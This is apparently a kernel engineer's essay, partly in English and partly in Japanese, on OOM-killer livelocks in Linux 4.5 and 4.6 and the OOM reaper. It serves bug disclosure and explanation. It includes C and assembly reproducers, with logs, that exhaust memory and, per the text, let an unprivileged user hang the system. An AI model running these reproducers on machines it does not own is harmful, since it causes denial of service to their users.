1990 6997 58 17 0 0 avahi-daemon [ 153.675240] [ 2015] 0 2015 52593 433 56 0 0 abrtd [ 153.677508] [ 2017] 0 2017 51993 339 54 0 0 abrt-watch-log [ 153.679997] [ 2018] 0 2018 1094 24 8 0 0 rngd [ 153.682203] [ 2044] 0 2044 31583 150 21 0 0 crond [ 153.684481] [ 2181] 0 2181 46752 224 41 0 0 vmtoolsd [ 153.686791] [ 2803] 0 2803 27631 3114 51 0 0 dhclient [ 153.689039] [ 2807] 999 2807 132051 2254 54 0 0 polkitd [ 153.691348] [ 2890] 0 2890 20640 216 40 0 -1000 sshd [ 153.693561] [ 2893] 0 2893 138262 2660 91 0 0 tuned [ 153.695769] [ 4096] 0 4096 22785 252 42 0 0 master [ 153.698045] [ 4102] 0 4102 64751 994 57 0 -900 abrt-dbus [ 153.700317] [ 4108] 0 4108 23201 163 51 0 0 login [ 153.702487] [ 4109] 0 4109 27509 33 12 0 0 agetty [ 153.704747] [ 4113] 0 4113 79455 358 104 0 0 nmbd [ 153.706944] [ 4115] 89 4115 22811 249 44 0 0 pickup [ 153.709075] [ 4116] 89 4116 22828 250 45 0 0 qmgr [ 153.711222] [ 4130] 0 4130 96508 528 138 0 0 smbd [ 153.713329] [ 4134] 0 4134 96508 528 132 0 0 smbd [ 153.715421] [ 4137] 1000 4137 28884 130 14 0 0 bash [ 153.717453] [ 4158] 1000 4158 541715 385821 763 0 0 memset+write [ 153.719591] [ 4160] 1000 4160 1042 21 6 0 0 memset+write [ 153.721674] [ 4161] 1000 4161 1042 21 6 0 0 memset+write [ 153.723898] [ 4162] 1000 4162 1042 21 6 0 0 memset+write [ 153.725988] [ 4163] 1000 4163 1042 21 6 0 0 memset+write [ 153.728070] [ 4164] 1000 4164 1042 21 6 0 0 memset+write [ 153.730085] [ 4165] 1000 4165 1042 21 6 0 0 memset+write [ 153.732057] [ 4166] 1000 4166 1042 21 6 0 0 memset+write [ 153.734018] [ 4167] 1000 4167 1042 21 6 0 0 memset+write [ 153.735981] [ 4168] 1000 4168 1042 21 6 0 0 memset+write [ 153.737926] Out of memory: Kill process 4158 (memset+write) score 869 or sacrifice child [ 153.739792] Killed process 4160 (memset+write) total-vm:4168kB, anon-rss:84kB, file-rss:0kB ---------- Example output end ----------
(Footnote: The reproducibility of hangup is not 100%. Likeliness of reproducing the hangup depends on timings and environments. Also, when the system hung up, the CPU usage can remain 100% in some cases, and the CPU usage can remain 0% in other cases.)
The answer is The "too small to fail" memory-allocation rule which exposed the contradiction in the memory management subsystem in Christmas of 2014.
It turned out that, memory allocation requests which are less than or equals to order-3 (1 byte to 32768 bytes), unless TIF_MEMDIE is set by the OOM killer, retry forever until they succeeds.
On the other hand, since the callers of GFP_NOFS allocation requests (for performing fs writeback operations, like xfs filesystems) did not expect such behavior, the callers of GFP_NOFS allocation requests cannot make forward progress unless TIF_MEMDIE is set. As a result, the callers of GFP_KERNEL allocation requests (like applications) are forever blocked by the callers of GFP_NOFS allocation requests.
If TIF_MEMDIE was set on a thread doing GFP_NOFS allocation requests, or, GFP_NOFS had higher preference than GFP_KERNEL, the kernel would not have blocked forever threads doing GFP_KERNEL allocation requests. But since xfs filesystem is cooperating among many kernel threads in order to perform complicated operations, it was impossible to set TIF_MEMDIE to a thread doing GFP_NOFS allocation requests, and resulted in blocking forever.
This affair became a trigger for seriously consider about behavior of the kernel under memory pressure. Until then, this was a problem which merely makes involved people angry with "Your system is already DoS attacked and it is too late to recover. Give up and restart your system." Now, the direction of the wind changed drastically.
This became a far seriously important problem than CVE-2013-4312 (later CVE-2016-2847), and as a troubleshooting staff at support center who handled unexplained hangups I came to think that we by all means want to avoid this problem.
Due to existence of aforementioned the "too small to fail" memory-allocation rule, doing a memory allocation request with locks held entails risk of lockup because a process which was killed (and has TIF_MEMDIE flag set) by the OOM killer invoked by a memory allocation request cannot make forward progress due to waiting for other process doing that memory allocation request with locks held.
But locks are necessary for exclusion control. A caller of memory allocation request cannot allocate memory due to unable to determine how much memory is required until exclusion control begins (or locks are held).
If all locations between holding a lock till releasing that lock were killable (i.e. can be interrupted by SIGKILL signal), this will not be a problem. But not all locations which might allocate memory with a lock held are killable.
As a result, TIF_MEMDIE not only serves as a mechanism for "not to kill processes more than necessary" but also serves as a mechanism for "hang up the system if the process killed by the OOM killer cannot terminate and release memory".
This is OOM livelock situation which occurs when the OOM killer was invoked.
As a side note, there is also OOM livelock situation which occurs when the OOM killer was not invoked (i.e. there is no process with TIF_MEMDIE set) which is caused by different causes. Such cases are explained in Various ambushes, in chronological order?
The affair occurred one month after the discussion of memory consumption attack using pipe's buffer went to public mailing lists.
At the public mailing lists, I proposed invoking the OOM killer using timeout, for there are so many kernel versions which are vulnerable to this attack, and I also wanted a workaround for hang up problems without invoking the OOM killer, and I put most priority for backportable approach.
But Michal Hocko is rigidly opposed to timeout-based workarounds and is asking for a solution which does not use timeouts. Therefore, I'm trying to clarify all of the locations which might result in a hangup, and presenting a reproducer and a log as much as possible, and questioning him about "How can you handle this case without using timeout?", and such days are lasting even now.
→Thanks to such effort, various unexpected ambushes were discovered one after another in this one year and a half. Of course, not all ambushes were discovered are discovered, and some of ambushes are left unfixed.
In order to avoid convoluting the story, I first explain about OOM reaper which is a mitigation for OOM livelock situation after the kernel was able to invoke the OOM killer. (Well, OOM reaper alone is long enough.)
Firstly, I explain the flow of the OOM killer as of Linux 4.5. (The flow of the OOM killer is very complicated, and has a history of trial and errors. Thus, the flow might be different for older kernels.)
(kill1) |
out_of_memory() is called when free memory was unavailable (an OOM situation occurred) for allocation requests with either "order is less or equals to 3 and contain __GFP_FS flag" or "contain __GFP_NOFAIL" flag. |
(kill2) |
If current thread has already received SIGKILL or already has PF_EXITING (terminating) flag, the OOM killer sets TIF_MEMDIE flag to current thread and returns to the caller, so that we don't kill more processes than needed because there is a possibility of making free memory by releasing memory associated with current thread's mm_struct. (Trap 1) |
(kill3) |
Otherwise, select_bad_process() is called from out_of_memory(), in order to find candidate processes for forced termination. |
(kill4) |
select_bad_process() calls oom_scan_process_thread() on all threads of all thread groups which exist in the system. If oom_scan_process_thread() returned OOM_SCAN_ABORT, select_bad_process() stops searching for candidates and returns -1 to out_of_memory(). If oom_scan_process_thread() returned OOM_SCAN_SELECT, select select_bad_process() marks that thread as the highest candidate. But scanning is continued because there is a possibility that oom_scan_process_thread() returns OOM_SCAN_ABORT for some other thread after oom_scan_process_thread() returned OOM_SCAN_SELECT for one thread. If oom_scan_process_thread() returned OOM_SCAN_CONTINUE, select_bad_process() skips that thread. If oom_scan_process_thread() returned OOM_SCAN_OK, select_bad_process() calls oom_badness() on that thread, in order to determine degree of contribution for OOM situation. If the value returned by oom_badness() (the minimum value is 0) for that thread is larger than the highest candidate's value, select_bad_process() marks that thread as new candidate. If there was at least one candidate thread, select_bad_process() returns that thread to out_of_memory(). Otherwise, select_bad_process() returns 0 to out_of_memory(). |
(kill5) |
oom_scan_process_thread() determines whether that thread can become a candidate for forced termination by the OOM killer. Firstly, oom_scan_process_thread() returns OOM_SCAN_CONTINUE to select_bad_process() if that thread is the init process (which will lead to kernel panic if forcibly terminated) or is kernel threads (which are not suitable to forcibly terminate), in order to make sure that the OOM killer will not terminate that process. Next, oom_scan_process_thread() returns OOM_SCAN_ABORT to select_bad_process() if that thread already has TIF_MEMDIE flag, in order to make sure that the OOM killer will not terminate more processes than needed. (Trap 2) Next, since there is an assumption that majority of memory consumption is associated with mm_struct, oom_scan_process_thread() returns OOM_SCAN_CONTINUE to select_bad_process() if that thread does not have mm_struct, in order to skip that thread. Next, since it is likely that the cause of OOM situation is trying to delete swap partition (i.e. swapoff() system call), oom_scan_process_thread() returns OOM_SCAN_SELECT to select_bad_process() if that thread is trying to delete swap partition, in order to make sure that the OOM killer forcibly terminates that thread in order to abort deleting swap partition. Next, since there is a possibility that an already terminating thread can make free memory by releasing mm_struct, oom_scan_process_thread() returns OOM_SCAN_ABORT to select_bad_process() if that thread if that thread is already terminating, in order to make sure that the OOM killer will not terminate more processes than needed. (Trap 3) Otherwise, since such thread can become a candidate for forced termination by the OOM killer, oom_scan_process_thread() returns OOM_SCAN_OK to select_bad_process(). |
(kill6) |
oom_badness() evaluates degree of contribution for OOM situation. Firstly, oom_badness() returns 0 to select_bad_process() if that thread is the init process (which will lead to kernel panic if forcibly terminated) or is kernel threads (which are not suitable to forcibly terminate), in order to make sure that the OOM killer will not terminate that process. Next, since all threads in a thread group are considered as already terminating, oom_badness() returns 0 to select_bad_process() if none of threads in a thread group which contains that thread has mm_struct, in order to skip that thread. Next, since the system administrator does not want the OOM killer to forcibly terminate processes with oom_score_adj value (the content of /proc/$pid/oom_score_adj ) equals to -1000, oom_badness() returns 0 to select_bad_process() if a thread group which contains that thread has oom_score_adj value equals to -1000. Otherwise, oom_badness() returns a value larger than 0 to select_bad_process(), based on a score calculated from memory usage associated with that thread group's mm_struct. |
(kill7) |
As of returning from select_bad_process(), the candidate process for forced termination is determined. If select_bad_process() returned -1, out_of_memory() returns to the caller without doing anything. If select_bad_process() returned 0, out_of_memory() triggers kernel panic. If select_bad_process() returned neither -1 nor 0, out_of_memory() passes that value to oom_kill_process(). |
(kill8) |
oom_kill_process() does the job for forced termination by actually sending SIGKILL signal. Firstly, if that process is already terminating, the OOM killer sets TIF_MEMDIE flag to that thread and returns to the caller, so that we don't kill more processes than needed because there is a possibility of making free memory by releasing memory associated with that thread's mm_struct. (Trap 4) Next, the OOM killer prints messages that indicate the OOM killer was invoked. This is the first stage, administrator can confirm that the OOM killer was invoked. If an OOM livelock situation occurred prior to this stage, it looks like that the system hung up without any messages. Next, the OOM killer checks all child processes of a process which contains that thread for forced termination. And if the OOM killer found a child process which is suitable for forced termination, the OOM killer selects that process as the final candidate for forced termination. This is based on a heuristic that "killing a child process likely has smaller damage for the system than killing a parent process". I consider that the OOM killer should not select a child process if that thread was selected by OOM_SCAN_SELECT because the OOM killer will needlessly kill all child processes of that thread, but the OOM killer unconditionally tries to select a child. This is based on a heuristic that "it is unlikely that a process which deletes a swap partition has child processes". As of this point, a thread group for forced termination is finalized. |
(kill9) |
The OOM killer sends SIGKILL signal to a thread group containing that thread, and sets TIF_MEMDIE flag to first thread which has mm_struct in that thread group. The reason why TIF_MEMDIE flag is set to a thread which has mm_struct is explained later. |
(kill10) |
Also, the OOM killer sends SIGKILL signal to all thread groups sharing that mm_struct if they are suitable for forced termination. There is a comment in the source code that "this is necessary for avoiding OOM livelock caused by mm->mmap_sem", but there is no guarantee that we can reliably avoid it. It just reduces possibility of occurring OOM livelock caused by mm->mmap_sem. (Trap 5) Also, there is a comment that "threads which were forcibly terminated but did not get TIF_MEMDIE flag are no problem because such threads will get TIF_MEMDIE next time out_of_memory() is called because they already have received SIGKILL signal", but there is no guarantee that TIF_MEMDIE flag is set reliably. (Trap 6) |
From (Trap 1) to (Trap 6) are pitfalls where the OOM livelock situation can occur if waited that situation (for forever and unconditionally). But probably you are not sure why they can be traps. Therefore, I explain the flow of termination a thread (mainly steps till disassociating mm_struct and clearing TIF_MEMDIE flag).
(exit1) |
A terminating thread calls do_exit() function. If that thread is terminating voluntarily, that thread will be able to call do_exit() smoothly. But if that thread is terminating forcibly by the OOM killer, it is possible that that thread is unable to call do_exit() due to being blocked in unkillable wait. If the cause of a thread being blocked in unkillable wait is memory allocation request, that thread won't be able to leave from unkillable wait until that memory allocation succeeds or fails. If that thread is doing memory allocation request, and already has SIGKILL signal received, TIF_MEMDIE flag will be set due to (kill2), and that thread can complete that memory allocation request. But if that thread is waiting for memory allocation of other threads with locks held, unless TIF_MEMDIE flag is set to threads due to (kill2) or (kill9), these threads can't complete their memory allocation requests. That is, (Trap 2) is "a typical OOM livelock situation which occurs when the OOM killer was invoked", and is caused by TIF_MEMDIE being not set to threads doing memory allocation. Also, (Trap 6) is caused by, like explained at (kill1), the OOM killer is not invoked unless that allocation request is either "order is less or equals to 3 and contain __GFP_FS flag" or "contains __GFP_NOFAIL" flag. For example, if that thread is doing GFP_NOFS or GFP_NOIO allocation request with order being less or equals to 3, TIF_MEMDIE flag will not be set on that thread due to (kill2) even if that thread already received SIGKILL signal. And OOM livelock situation occurs due to the "too small to fail" memory-allocation rule because that memory allocation requests loops forever as long as the OOM killer is called. And (Trap 1) is caused by TIF_MEMDIE is not set to other threads due to (kill5) after TIF_MEMDIE was set to one thread due to (kill2) and was able to complete that memory allocation request and then started waiting for memory allocation by other threads. |
(exit2) |
Steps afterwards are about a terminating thread was able to call do_exit(). A terminating thread gets PF_EXITING flag which indicates that "this thread is terminating" by calling exit_signals(). This allows current thread to get TIF_MEMDIE due to (kill2). |
(exit3) |
A terminating thread calls exit_mm() in order to release mm_struct. In exit_mm(), mmap_sem is held for shared (down_read(¤t->mm->mmap_sem)) in order to synchronize with operations for forced termination due to invalid memory access (core dump operation). Holding mmap_sem for shared mode means that somewhere holds mmap_sem for exclusive mode. While there are several locations which hold mmap_sem for exclusive mode, a typical location is mmap() operation. mmap() holds mmap_sem for exclusive mode (down_write(¤t->mm->mmap_sem)) and then does memory allocation requests. Therefore, (Trap 3) happens, when thread-A in a multi-threaded process is in unkillable wait state at down_read(¤t->mm->mmap_sem) after PF_EXITING flag was set, thread-B tries to invoke the OOM killer by doing a memory allocation request after down_write(¤t->mm->mmap_sem) but the OOM killer waits for thread-A which already got PF_EXITING flag to release mm_struct because the OOM killer fails to understand that thread-B needs to release mmap_sem held for exclusive mode in order to allow thread-A to release mm_struct. (Trap 5) is caused by falling into situation where other threads which passed down_write(¤t->mm->mmap_sem) are blocked by unkillable wait (inside memory allocation request or outside of memory allocation request) and thus cannot release mmap_sem held for exclusive mode. Similarly, (Trap 4) is caused by not sending SIGKILL to other threads which passed down_write(¤t->mm->mmap_sem) are blocked by unkillable wait or killable wait. |
(exit4) |
If mmap_sem was successfully held for shared mode, current thread performs core dump operation if needed. Then, current thread releases mm_struct and mmap_sem. But there is no guarantee that memory is reclaimed as free memory immediately after releasing mm_struct. If current thread is one of threads in a multi-threaded program, memory could not be reclaimed as free memory until all threads using that mm_struct releases their mm_struct. Thus, mmput(current->mm) is called in order to release only mm_struct used by current thread. Upon returning from mmput(current->mm), TIF_MEMDIE flag is cleared because memory which can be reclaimed is considered as reclaimed; and the OOM killer starts selecting other threads. mmput() decrements refcount, and performs memory reclaim operation only when that refcount dropped to 0. And memory reclaim operation includes operations (such as waiting for completion of asynchronous I/O) which could be blocked by memory allocation request. Since mm_struct was released but TIF_MEMDIE flag is not yet cleared, threads doing memory allocation request falls into (Trap 2) situation where the OOM killer cannot be invoked due to behavior explained at (kill5). Since it is considered that there is still memory reclaimable until an exiting thread returns from mmput(), allocating threads do not want to invoke the OOM killer. But there is an blank period where allocating threads cannot know that we are inside a situation where we cannot make forward progress without invoking the OOM killer. |
(exit5) |
After returning from exit_mm(), the rest of cleanup operations such as closing file descriptors are performed. Since mm_struct was already released, the behavior explained at (kill2) is no longer applied. If memory allocation requests caused by the rest of cleanup operations invoked the OOM killer, the OOM killer selects other threads. |
What did you think? The exclusion control which the OOM killer uses in order "not to kill more processes than necessary" did not think race conditions between other threads and did not consider cases where threads which are expected to release mm_struct are blocked. What an optimistic approach!
Therefore, introducing the OOM reaper, which will handle cases where threads which are expected to release mm_struct are blocked, becomes a solution for OOM livelock problem when the OOM killer could be invoked.
The OOM reaper, which was discussed at LSF/MM summit held in March 2015 and was introduced in Linux 4.6, can reduce the possibility of falling into OOM livelock situation by reclaiming memory used by thread group which was terminated by the OOM killer before mm_struct used by that thread group is released.
ということで、 Linux 4.6 時点での、 OOM killer の流れを説明します。
(kill1) | Linux 4.5 の (kill1) と同じであるため省略します。 |
(kill2) | Linux 4.5 の (kill2) と同じであるため省略します。 |
(kill3) | Linux 4.5 の (kill3) と同じであるため省略します。 |
(kill4) | Linux 4.5 の (kill4) と同じであるため省略します。 |
(kill5) | oom_scan_process_thread() は、そのスレッドが OOM killer により強制終了させる候補になりうるかどうかの判断を行います。 OOM livelock 状態の原因となりうる空白の期間を潰すために、 oom_scan_process_thread() 内の task_will_free_mem(task) 時の処理が削除されました。 それ以外は Linux 4.5 の (kill5) と同様です。 |
(kill6) | Linux 4.5 の (kill6) と同じであるため省略します。 |
(kill7) | Linux 4.5 の (kill7) と同じであるため省略します。 |
(kill8) | Linux 4.5 の (kill8) と同じであるため省略します。 |
(kill9) | Linux 4.5 の (kill9) と同じであるため省略します。 |
(kill10) | 強制終了させられるスレッドの mm_struct を使用している他のスレッドグループに対しても、 OOM killer により強制終了させることが妥当なスレッドグループであれば SIGKILL シグナルを送信します。 そして、その mm_struct を使用している全てのスレッドグループが OOM killer により強制終了させることが妥当なスレッドグループであった場合、 OOM reaper を呼び出します。 |
(kill11) | OOM reaper は、 mmap_sem を共有モードでの取得を試みます。 取得に成功した場合のみ、その mm_struct に含まれているメモリの内の解放可能なページを解放後、 mmap_sem を解放します。 なお、全てのスレッドが mm_struct を解放したときに呼ばれる mmput() の処理は呼ばれていませんが、回収可能なメモリは粗方回収されたとみなすことができるため、 OOM reaper が正常に動作できた場合( mmap_sem を共有モードで取得できた場合)には、 TIF_MEMDIE フラグをクリアし、そのスレッドを含むスレッドグループが再度 OOM killer により選択されないようにするために、 oom_score_adj に -1000 を設定しています。(Trap 7) |
スレッド終了時の流れは Linux 4.5 と同じであるため省略します。
(Trap 7)は、 OOM livelock 状態に陥る可能性がある箇所です。でも、どうして罠になりうるのでしょうか?
まずは、 OOM reaper が TIF_MEMDIE をクリアしている理由についてです。
OOM killer は、( oom_score_adj の値を加味した上で)最もメモリをたくさん消費しているプロセスを強制終了させる候補にしますが、 (kill8) で説明したとおり、 OOM killer により強制終了させることが妥当な子プロセスが存在する場合には、その子プロセスを選択します。そして、親プロセスがどんなにメモリをたくさん消費していたとしても、子プロセスのメモリ消費は限りなく 0 に近いという状況もありえます。例えば、以下のように、メモリ消費が限りなく 0 に近い子プロセスを OOM killer に選択させると、 OOM reaper は殆どメモリを回収することができません。
---------- oom-write.c ---------- #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> int main(int argc, char *argv[]) { unsigned long size; char *buf = NULL; unsigned long i; for (i = 0; i < 10; i++) { if (fork() == 0) { close(1); open("/tmp/file", O_WRONLY | O_CREAT | O_APPEND, 0600); execl("./write", "./write", NULL); _exit(1); } } for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) { char *cp = realloc(buf, size); if (!cp) { size >>= 1; break; } buf = cp; } sleep(5); /* Will cause OOM due to overcommit */ for (i = 0; i < size; i += 4096) buf[i] = 0; pause(); return 0; } ---------- oom-write.c ----------
---------- write.asm ---------- ; nasm -f elf write.asm && ld -s -m elf_i386 -o write write.o section .text CPU 386 global _start _start: ; whlie (write(1, buf, 4096) == 4096); mov eax, 4 ; NR_write mov ebx, 1 mov ecx, _start - 96 mov edx, 4096 int 0x80 cmp eax, 4096 je _start ; pause(); mov eax, 29 ; NR_pause int 0x80 ; _exit(0); mov eax, 1 ; NR_exit mov ebx, 0 int 0x80 ---------- write.asm ----------
---------- Example output start ---------- [ 78.157198] oom-write invoked oom-killer: order=0, oom_score_adj=0, gfp_mask=0x24280ca(GFP_HIGHUSER_MOVABLE|GFP_ZERO) (...snipped...) [ 78.325409] [ 3805] 1000 3805 541715 357876 708 6 0 0 oom-write [ 78.327978] [ 3806] 1000 3806 39 1 3 2 0 0 write [ 78.330149] [ 3807] 1000 3807 39 1 3 2 0 0 write [ 78.332167] [ 3808] 1000 3808 39 1 3 2 0 0 write [ 78.334488] [ 3809] 1000 3809 39 1 3 2 0 0 write [ 78.336471] [ 3810] 1000 3810 39 1 3 2 0 0 write [ 78.338414] [ 3811] 1000 3811 39 1 3 2 0 0 write [ 78.340709] [ 3812] 1000 3812 39 1 3 2 0 0 write [ 78.342711] [ 3813] 1000 3813 39 1 3 2 0 0 write [ 78.344727] [ 3814] 1000 3814 39 1 3 2 0 0 write [ 78.346613] [ 3815] 1000 3815 39 1 3 2 0 0 write [ 78.348829] Out of memory: Kill process 3805 (oom-write) score 808 or sacrifice child [ 78.350818] Killed process 3806 (write) total-vm:156kB, anon-rss:4kB, file-rss:0kB, shmem-rss:0kB [ 78.455314] oom-write invoked oom-killer: order=0, oom_score_adj=0, gfp_mask=0x24280ca(GFP_HIGHUSER_MOVABLE|GFP_ZERO) (...snipped...) [ 78.631333] [ 3805] 1000 3805 541715 361440 715 6 0 0 oom-write [ 78.633802] [ 3807] 1000 3807 39 1 3 2 0 0 write [ 78.635977] [ 3808] 1000 3808 39 1 3 2 0 0 write [ 78.638325] [ 3809] 1000 3809 39 1 3 2 0 0 write [ 78.640463] [ 3810] 1000 3810 39 1 3 2 0 0 write [ 78.642837] [ 3811] 1000 3811 39 1 3 2 0 0 write [ 78.644924] [ 3812] 1000 3812 39 1 3 2 0 0 write [ 78.646990] [ 3813] 1000 3813 39 1 3 2 0 0 write [ 78.649039] [ 3814] 1000 3814 39 1 3 2 0 0 write [ 78.651242] [ 3815] 1000 3815 39 1 3 2 0 0 write [ 78.653326] Out of memory: Kill process 3805 (oom-write) score 816 or sacrifice child [ 78.655235] Killed process 3807 (write) total-vm:156kB, anon-rss:4kB, file-rss:0kB, shmem-rss:0kB [ 88.776446] MemAlloc-Info: 1 stalling task, 1 dying task, 1 victim task. [ 88.778228] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=10000 [ 88.780158] MemAlloc: write(3807) uninterruptible dying victim (...snipped...) [ 98.915687] MemAlloc-Info: 8 stalling task, 1 dying task, 1 victim task. [ 98.917888] MemAlloc: kthreadd(2) seq=12 gfp=0x27000c0 order=2 delay=14885 uninterruptible [ 98.920297] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=20139 [ 98.922652] MemAlloc: irqbalance(1710) seq=3 gfp=0x24280ca order=0 delay=16231 [ 98.924874] MemAlloc: vmtoolsd(1908) seq=1 gfp=0x2400240 order=0 delay=20044 [ 98.927043] MemAlloc: pickup(3680) seq=1 gfp=0x2400240 order=0 delay=10230 uninterruptible [ 98.929405] MemAlloc: nmbd(3713) seq=1 gfp=0x2400240 order=0 delay=14716 [ 98.931559] MemAlloc: oom-write(3805) seq=12718 gfp=0x24280ca order=0 delay=14887 [ 98.933843] MemAlloc: write(3806) seq=29813 gfp=0x2400240 order=0 delay=14887 uninterruptible exiting [ 98.936460] MemAlloc: write(3807) uninterruptible dying victim (...snipped...) [ 140.356230] MemAlloc-Info: 9 stalling task, 1 dying task, 1 victim task. [ 140.358448] MemAlloc: kthreadd(2) seq=12 gfp=0x27000c0 order=2 delay=56326 uninterruptible [ 140.360979] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=61580 uninterruptible [ 140.363716] MemAlloc: irqbalance(1710) seq=3 gfp=0x24280ca order=0 delay=57672 [ 140.365983] MemAlloc: vmtoolsd(1908) seq=1 gfp=0x2400240 order=0 delay=61485 uninterruptible [ 140.368521] MemAlloc: pickup(3680) seq=1 gfp=0x2400240 order=0 delay=51671 uninterruptible [ 140.371128] MemAlloc: nmbd(3713) seq=1 gfp=0x2400240 order=0 delay=56157 uninterruptible [ 140.373548] MemAlloc: smbd(3734) seq=1 gfp=0x27000c0 order=2 delay=48147 [ 140.375722] MemAlloc: oom-write(3805) seq=12718 gfp=0x24280ca order=0 delay=56328 uninterruptible [ 140.378647] MemAlloc: write(3806) seq=29813 gfp=0x2400240 order=0 delay=56328 exiting [ 140.381695] MemAlloc: write(3807) uninterruptible dying victim (...snipped...) [ 150.493557] MemAlloc-Info: 7 stalling task, 1 dying task, 1 victim task. [ 150.495725] MemAlloc: kthreadd(2) seq=12 gfp=0x27000c0 order=2 delay=66463 [ 150.497897] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=71717 uninterruptible [ 150.500490] MemAlloc: vmtoolsd(1908) seq=1 gfp=0x2400240 order=0 delay=71622 uninterruptible [ 150.502940] MemAlloc: pickup(3680) seq=1 gfp=0x2400240 order=0 delay=61808 [ 150.505122] MemAlloc: nmbd(3713) seq=1 gfp=0x2400240 order=0 delay=66294 uninterruptible [ 150.507521] MemAlloc: smbd(3734) seq=1 gfp=0x27000c0 order=2 delay=58284 [ 150.509678] MemAlloc: oom-write(3805) seq=12718 gfp=0x24280ca order=0 delay=66465 uninterruptible [ 150.512333] MemAlloc: write(3807) uninterruptible dying victim ---------- Example output end ----------
そのため、 OOM reaper が OOM 状態を解消するのに充分な量のメモリを回収できなかった場合には、 OOM livelock 状態に陥ってしまいます。これを避けるために、メモリを回収した後に TIF_MEMDIE をクリアするようにしています。
次に、 OOM reaper が oom_score_adj に -1000 を設定する理由についてです。
OOM killer により選ばれた子プロセスのメモリを OOM reaper が回収した後も、その子プロセスが mm_struct を解放するまでは OOM killer により再度選択されてしまいます。既に回収可能なメモリを回収したプロセスを OOM killer が選択しても、 OOM reaper はそれ以上回収できないため、 OOM livelock 状態に陥ってしまいます。これを避けるために、 -1000 を設定するようにしています。(Trap 8)
しかし、この挙動は、 Linux 4.5 までは一般ユーザの権限では発生させられなかった OOM livelock 状態を Linux 4.6 では一般ユーザの権限で発生させることができてしまうという新しい罠を発生させてしまいました。どのような場合に(Trap 8)を踏むことになるか、お気づきでしょうか?ヒントは「ひねくれ者のマルチスレッド」です。
clone() システムコールに CLONE_VM を指定して CLONE_SIGHAND を指定しなかった場合、同じ mm_struct を参照しているのに異なる /proc/$pid/oom_score_adj を持つスレッドグループが作成されます。
OOM killer は、同じ mm_struct を参照している全てのスレッドの中から、1個のスレッドだけに TIF_MEMDIE を設定します。そして、 OOM reaper は、そのスレッドから TIF_MEMDIE をクリアするのと同時に、そのスレッドを含むスレッドグループの oom_score_adj だけを -1000 に設定します。
その結果、同じ mm_struct を参照しているスレッドグループの内、1つだけが「 OOM killer により強制終了させるのが妥当ではない/ OOM reaper によりメモリを回収するのが妥当ではない」状態で、それ以外は「 OOM killer により強制終了させるのが妥当である」状態という、「超ひねくれ者のマルチスレッド」を作り出すことができてしまいました。
---------- oom-write2.c ---------- #define _GNU_SOURCE #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sched.h> static int writer(void *unused) { static char buffer[4096]; int fd = open("/tmp/file", O_WRONLY | O_CREAT | O_APPEND, 0600); while (write(fd, buffer, sizeof(buffer)) == sizeof(buffer)); return 0; } int main(int argc, char *argv[]) { unsigned long size; char *buf = NULL; unsigned long i; if (fork() == 0) { int fd = open("/proc/self/oom_score_adj", O_WRONLY); write(fd, "1000", 4); close(fd); for (i = 0; i < 2; i++) { char *stack = malloc(4096); if (stack) clone(writer, stack + 4096, CLONE_VM, NULL); } writer(NULL); while (1) pause(); } sleep(1); for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) { char *cp = realloc(buf, size); if (!cp) { size >>= 1; break; } buf = cp; } sleep(5); /* Will cause OOM due to overcommit */ for (i = 0; i < size; i += 4096) buf[i] = 0; pause(); return 0; } ---------- oom-write2.c ----------
---------- Example output start ---------- [ 177.722853] a.out invoked oom-killer: gfp_mask=0x24280ca(GFP_HIGHUSER_MOVABLE|__GFP_ZERO), order=0, oom_score_adj=0 [ 177.724956] a.out cpuset=/ mems_allowed=0 [ 177.725735] CPU: 3 PID: 3962 Comm: a.out Not tainted 4.5.0-rc2-next-20160204 #291 (...snipped...) [ 177.802889] [ pid ] uid tgid total_vm rss nr_ptes nr_pmds swapents oom_score_adj name (...snipped...) [ 177.872248] [ 3941] 1000 3941 28880 124 14 3 0 0 bash [ 177.874279] [ 3962] 1000 3962 541717 395780 784 6 0 0 a.out [ 177.876274] [ 3963] 1000 3963 1078 21 7 3 0 1000 a.out [ 177.878261] [ 3964] 1000 3964 1078 21 7 3 0 1000 a.out [ 177.880194] [ 3965] 1000 3965 1078 21 7 3 0 1000 a.out [ 177.882262] Out of memory: Kill process 3963 (a.out) score 998 or sacrifice child [ 177.884129] Killed process 3963 (a.out) total-vm:4312kB, anon-rss:84kB, file-rss:0kB, shmem-rss:0kB [ 177.887100] oom_reaper: reaped process :3963 (a.out) anon-rss:0kB, file-rss:0kB, shmem-rss:0lB [ 179.638399] crond invoked oom-killer: gfp_mask=0x24201ca(GFP_HIGHUSER_MOVABLE|__GFP_COLD), order=0, oom_score_adj=0 [ 179.647708] crond cpuset=/ mems_allowed=0 [ 179.652996] CPU: 3 PID: 742 Comm: crond Not tainted 4.5.0-rc2-next-20160204 #291 (...snipped...) [ 179.771311] [ pid ] uid tgid total_vm rss nr_ptes nr_pmds swapents oom_score_adj name (...snipped...) [ 179.836221] [ 3941] 1000 3941 28880 124 14 3 0 0 bash [ 179.838278] [ 3962] 1000 3962 541717 396308 785 6 0 0 a.out [ 179.840328] [ 3963] 1000 3963 1078 0 7 3 0 -1000 a.out [ 179.842443] [ 3965] 1000 3965 1078 0 7 3 0 1000 a.out [ 179.844557] Out of memory: Kill process 3965 (a.out) score 998 or sacrifice child [ 179.846404] Killed process 3965 (a.out) total-vm:4312kB, anon-rss:0kB, file-rss:0kB, shmem-rss:0kB ---------- Example output end ----------
その結果、1回目の OOM reaper 呼び出しにより回収済みとなったスレッドグループは、2回目以降の OOM reaper 呼び出しが行われなくなり、誰も TIF_MEMDIE フラグをクリアしないために、 OOM livelock 状態に陥ってしまった訳です。
もし、 (kill10) の中で、 OOM killer により強制終了させることが妥当なスレッドグループであるかどうかを判断する際に、既に SIGKILL シグナルを受信しているかどうかも確認するようになっていれば、 OOM reaper を呼び出すことができ、 OOM livelock 状態に陥ることは無かった筈です。
